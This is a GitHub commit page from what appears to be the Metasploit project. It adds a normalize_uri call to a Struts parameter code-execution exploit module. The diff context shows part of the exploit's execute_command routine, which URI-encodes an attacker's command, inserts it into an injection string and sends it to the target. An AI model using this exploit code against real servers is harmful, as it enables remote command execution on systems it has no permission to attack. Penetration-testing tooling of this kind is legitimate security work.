Skip to content

Commit a714b43

Browse files
ConsoleConsole
committed
used normalize_uri
1 parent 5c9bec1 commit a714b43

File tree

1 file changed

+1
-0
lines changed

1 file changed

+1
-0
lines changed

modules/exploits/multi/http/struts_code_exec_parameters.rb

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -80,6 +80,7 @@ def execute_command(cmd, opts = {})
8080
inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['Parameter']))
8181
inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
8282
uri = String.new(datastore['TARGETURI'])
83+
uri = normalize_uri(uri)
8384
uri.gsub!(/INJECT/,inject) # append the injection string
8485
resp = send_request_cgi({
8586
'uri' => uri,

0 commit comments

Comments
 (0)